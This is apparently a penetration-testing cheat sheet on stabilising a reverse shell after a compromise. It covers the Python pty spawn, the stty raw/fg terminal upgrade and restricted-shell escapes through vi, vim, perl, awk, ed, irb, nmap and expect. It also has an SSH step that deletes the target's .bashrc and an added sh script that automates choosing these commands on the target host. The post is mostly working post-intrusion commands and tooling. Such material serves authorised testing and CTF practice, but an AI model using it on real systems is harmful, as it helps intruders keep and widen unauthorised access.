
Stable Shell: Post Exploitation

These steps stabilise a freshly caught shell: upgrade it to an interactive pseudo-terminal, escape a restricted shell if you land in one, and make sure the usual binaries and terminal features are available. Unless a comment says otherwise, the commands are typed into the shell on the target; the `stty`/`fg` step is the exception and runs in the attacker's own terminal.

# On the target: use Python to spawn a pseudo-terminal for a more interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
OR
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Set PATH so the common binaries resolve; reverse shells often start with a minimal one.
# Some cheat sheets append /tmp here. Avoid that: a world-writable directory in PATH lets
# any local user drop a binary that shadows a real command.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

# Set the terminal type so programs can use colour, cursor movement and clear-screen.
export TERM=xterm-256color

# Alias 'll' to a detailed, colour-coded listing (newest first, human-readable sizes).
alias ll='ls -lsaht --color=auto'


# Upgrade to a fully interactive TTY (tab completion, arrow keys, Ctrl+C without killing
# the listener). Do this after the Python pty spawn above, in this order:

# 1. Background the reverse shell (the listener process) on the attacker machine.
Keyboard Shortcut: Ctrl + Z (Background Process.)

# 2. In the attacker terminal: switch the local terminal to raw mode with echo off, so every
#    keystroke is passed straight through to the remote pty, then bring the listener back.
stty raw -echo ; fg

# 3. The screen may look frozen because local echo is off; type reset and press Enter.
#    It is sent to the remote shell and reinitialises the remote terminal.
reset

# One-liner variant: the trailing reset runs locally once fg returns, so the attacker
# terminal is restored automatically when the session ends instead of being left in raw mode.
stty raw -echo;fg;reset

# 4. Back in the target shell, set the terminal dimensions so output is not wrapped or cut off.
#    Match your own terminal: `stty size` on the attacker machine prints "rows columns".
stty columns 200 rows 200

# (in some cases export TERM=linux works better than xterm-256color)



# Check if the shell is restricted and attempt to escape using vi or vim.
# For vi:
$ vi
:set shell=/bin/sh
:shell

# For vim:
$ vim
:set shell=/bin/sh
:shell

# Another method to escape a restricted bash when the restrictions are applied from the
# user's own dotfiles: run a shell directly as the SSH command, delete ~/.bashrc from it,
# then log in again normally. user@host is a placeholder for the target account.
ssh user@host "/bin/sh"
rm $HOME/.bashrc
exit
ssh user@host
# Caveat: a genuine rbash login shell refuses command names containing '/', so this only
# works where the restriction is enforced by .bashrc rather than by the login shell itself.

# Check if Python is available to spawn a shell.
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

# Check if Perl is available to execute a shell.
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'

# Check if AWK is available to execute a shell.
awk 'BEGIN {system("/bin/bash -i")}'
awk 'BEGIN {system("/bin/sh -i")}'

# Check if ed is available to execute a shell.
ed
!sh

# Check if Ruby's IRB is available: start it, then exec a shell from inside it.
irb
exec "/bin/sh"

# Check if an old Nmap is available. Interactive mode was removed in the 5.x series, so this
# only works on legacy installs.
nmap --interactive
nmap> !sh

# Use Expect to automate interaction with the shell.
expect -v
  expect version 5.45.4
  
# Create an Expect script to spawn a bash shell and interact with it.
$ cat > /tmp/shell.sh <<EOF
#!/usr/bin/expect
spawn bash
interact
EOF

# Make the script executable and run it.
$ chmod u+x /tmp/shell.sh
$ /tmp/shell.sh
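The checks above all follow one pattern: see which interpreter or editor the target has, then use it to spawn a pty or break out of the restricted shell. The script below, added here as an example and not part of the original post, automates that pattern for both the pty-upgrade step and the restricted-shell escapes, and builds the PATH/TERM/stty lines to paste once the pty is up. It is plain POSIX sh so it runs on a minimal target. The function names, the candidate order and the `script -qc` fallback are my own choices; the escape commands themselves are the ones listed on this page.

```shell
#!/bin/sh
# Added example (not from the original post): target-side helpers that pick the pty
# upgrade and the restricted-shell escape from whatever interpreters are actually
# installed, trying them in the order used above. POSIX sh only, since a restricted
# or minimal target may have nothing else. Candidate lists and names are assumptions.

# Print the first name from the space-separated list that resolves in PATH; exit 1 if none.
first_available() {
    for cand in $1; do
        if command -v "$cand" >/dev/null 2>&1; then
            printf '%s\n' "$cand"
            return 0
        fi
    done
    return 1
}

# Command that upgrades a dumb reverse shell to a pty. util-linux 'script' is the
# fallback when neither Python is present.
pty_spawn_cmd() {
    tool=$(first_available "python3 python script") || return 1
    case "$tool" in
        python3|python) printf "%s -c 'import pty; pty.spawn(\"/bin/bash\")'\n" "$tool" ;;
        script)         printf 'script -qc /bin/bash /dev/null\n' ;;
    esac
}

# First usable restricted-shell escape. Interpreters come before editors because they
# need no interactive step; ed and irb need one more command once inside.
escape_cmd() {
    tool=$(first_available "python3 python perl awk vim vi expect ed irb") || return 1
    case "$tool" in
        python3|python) printf "%s -c 'import pty; pty.spawn(\"/bin/sh\")'\n" "$tool" ;;
        perl)           printf "perl -e 'exec \"/bin/sh\";'\n" ;;
        awk)            printf "awk 'BEGIN {system(\"/bin/sh -i\")}'\n" ;;
        vim|vi)         printf '%s -c ":set shell=/bin/sh" -c ":shell"\n' "$tool" ;;
        expect)         printf "expect -c 'spawn /bin/sh; interact'\n" ;;
        ed)             printf 'ed    # then type: !sh\n' ;;
        irb)            printf 'irb   # then type: exec "/bin/sh"\n' ;;
    esac
}

# Lines to paste after the pty upgrade. ROWS and COLS should be the two numbers printed by
# `stty size` on the attacker machine. Non-numeric input is rejected rather than passed to
# stty. PATH deliberately omits /tmp: a world-writable directory in PATH invites hijacking.
env_setup_cmds() {
    rows=$1; cols=$2; term=${3:-xterm-256color}
    case "$rows" in ''|*[!0-9]*) return 1 ;; esac
    case "$cols" in ''|*[!0-9]*) return 1 ;; esac
    printf 'export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n'
    printf 'export TERM=%s\n' "$term"
    printf 'stty rows %s columns %s\n' "$rows" "$cols"
}

# Usage: sh stabilise.sh ROWS COLS
if [ $# -eq 2 ]; then
    echo "# 1. on the target, upgrade to a pty (or escape the restricted shell):"
    pty_spawn_cmd || escape_cmd || echo "# no usable interpreter found"
    echo "# 2. Ctrl+Z, then locally: stty raw -echo; fg   -- then paste on the target:"
    env_setup_cmds "$1" "$2" || echo "# ROWS and COLS must be numeric"
fi
```

Copy the script over as text (cat > /tmp/stabilise.sh <<'EOF' ... EOF) rather than relying on a file transfer tool, since a restricted shell may not have one. The lookups use `command -v`, so the result reflects the target's PATH; if PATH itself has been stripped by the restricted shell, set it first and rerun.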
This post is licensed under CC BY 4.0 by the author.